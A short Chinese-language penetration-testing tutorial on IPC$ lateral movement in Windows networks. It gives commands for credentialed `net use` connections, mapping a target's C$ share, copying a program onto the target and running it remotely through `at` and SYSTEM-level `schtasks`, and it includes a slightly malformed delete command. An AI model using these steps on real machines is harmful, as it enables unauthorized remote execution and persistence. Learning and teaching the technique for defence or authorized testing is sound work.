1、IPC是什么?
    IPC是经典的内网渗透的操作之一,其实它本身并不算是一个漏洞,它只是为了方便管理员远程管理而开放的远程网络登录功能,主要是为了让进程之间相互通信。一般情况下,IPC需要139端口或445端口来支持

    2、基本操作:
    IPC空连接:不需要账户和密码即为空连接

    image.png
    image.png
    基本上没什么用,大部分都被阻止了

    1. IPC用户连接:输入正确的账户和密码,但会根据账户的权限有不同的反应<br /> net use \\192.168.49.131\IPC$ "password" /user:"username"<br /> <br /> ![image.png](https://cdn.nlark.com/yuque/0/2020/png/1431765/1591284209353-6f598ddb-284f-4f13-a07c-d688afcceabd.png#height=158&id=Pg3oO&margin=%5Bobject%20Object%5D&name=image.png&originHeight=186&originWidth=775&originalType=binary&ratio=1&size=18707&status=done&style=none&width=658)<br /> ![image.png](https://cdn.nlark.com/yuque/0/2020/png/1431765/1591284221934-1e96ebe3-36b5-4deb-9213-1fd170b0082c.png#height=176&id=q9q1q&margin=%5Bobject%20Object%5D&name=image.png&originHeight=182&originWidth=564&originalType=binary&ratio=1&size=14557&status=done&style=none&width=546)
    2. 将对方的C盘映射到本地的Z盘<br /> <br />net use z: \\192.168.49.131\c$<br /> ![image.png](https://cdn.nlark.com/yuque/0/2020/png/1431765/1591284250839-cdc9a46a-8849-426a-b2b1-87fef1411251.png#height=302&id=hWbS6&margin=%5Bobject%20Object%5D&name=image.png&originHeight=366&originWidth=588&originalType=binary&ratio=1&size=35738&status=done&style=none&width=485)
    3. 复制东西到对端<br /> ![image.png](https://cdn.nlark.com/yuque/0/2020/png/1431765/1591284287044-f54ce3e3-b050-456d-a13f-65d90713eb04.png#height=324&id=k1bq0&margin=%5Bobject%20Object%5D&name=image.png&originHeight=401&originWidth=687&originalType=binary&ratio=1&size=63290&status=done&style=none&width=555)<br />一般可以复制东西到对方后然后使用计划任务运行此程序,<br />at \\192.168.1.1 22:00 c:\\calc.exe<br />at \\192.168.1.1 1 /delete

    win7以及win2008以上
    schtasks /create /s 192.168.1.1 /tn test /sc onstart /tr c:\calc.bat /ru system /f 添加计划任务
    schtasks /run /s 192.168.1.1 /i /tn “test” 运行
    schtasks /delete /s /192.168.1.1 /tn “test” 删除

    1. 查看<br /> ![image.png](https://cdn.nlark.com/yuque/0/2020/png/1431765/1591284292468-63085ee7-43c8-4b9d-8712-cce38558fffd.png#height=91&id=t4cZn&margin=%5Bobject%20Object%5D&name=image.png&originHeight=93&originWidth=663&originalType=binary&ratio=1&size=7173&status=done&style=none&width=647)

    删除IPC连接
    net use * /del /y

    image.png

    在对方的电脑查看 net sessions
    image.png